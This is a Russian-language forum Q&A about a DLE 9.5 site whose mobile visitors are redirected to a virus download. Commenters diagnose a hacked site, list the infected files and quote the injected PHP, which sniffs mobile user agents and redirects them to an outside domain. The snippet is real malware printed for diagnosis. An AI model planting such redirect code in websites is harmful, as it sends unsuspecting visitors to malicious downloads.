Не нравятся результаты поиска? Попробуйте другой поиск!
dle-faq.ru FAQ (все вопросы) Ламерские вопросы Мобильная версия шаблона DLE 9.5

Мобильная версия шаблона DLE 9.5


     26.12.2012    Ламерские вопросы    3778

вопрос
Здравствуйте! Признаюсь, я совершенно ничего не знаю в сайтах и шаблонах. =)
В общем у меня не работает мобильная версия шаблона DLE 9.5
Вместо версии для смартфонов показывает что необходимо обновить браузер, но перекидывает на скачивание вируса.
Никаких поддоменов типа "m." не использую. Это автоматическая пересылка пользователя зашедшего со смартфона.
Подскажите, как и какой файл CSS надо редактировать для исправления данной ошибки шаблона для смартфонов?
Пожалуйста, я великий ламер в этом вопросе, можно как более подробно помочь мне в данном вопросе? =)

Ответил: nowheremany


обновите шаблон, у вас там вирус, ещё бы я предложил полностью сменить все пароли

Комментарии пользователей (3)

dj-avtosh
39

1479 | 390

dj-avtosh - 4 января 2013 22:46 - шашлычник

.htaccess и видимо запакованный скрипт в base_64

skype: elhan.isaev

MozgFx
1

39 | 23

MozgFx - 6 марта 2013 19:28 - Юзер

Это вам залили вирус редирект....
Новая болезнь для DLE нужно посмотреть какие файлы были изменены и скачать обновление с официального сайта.
Недавно столкнулся на одном из сайтов которые я обслуживаю.
Даже в языковом файле был обнаружен вирус.
С компьютера все Ок.
А вот Яндекс видит это как вирус.
А с мобильных при входе Вы попадете на редирект...

MozgFx
1

39 | 23

MozgFx - 6 марта 2013 19:41 - Юзер

вирус был залит в эти файлы
index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php
ещё в языковых файлах был

сам код вируса вот такой был:
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
}

Чтобы комментировать - войдите или зарегистрируйтесь на сайте

Похожие вопросы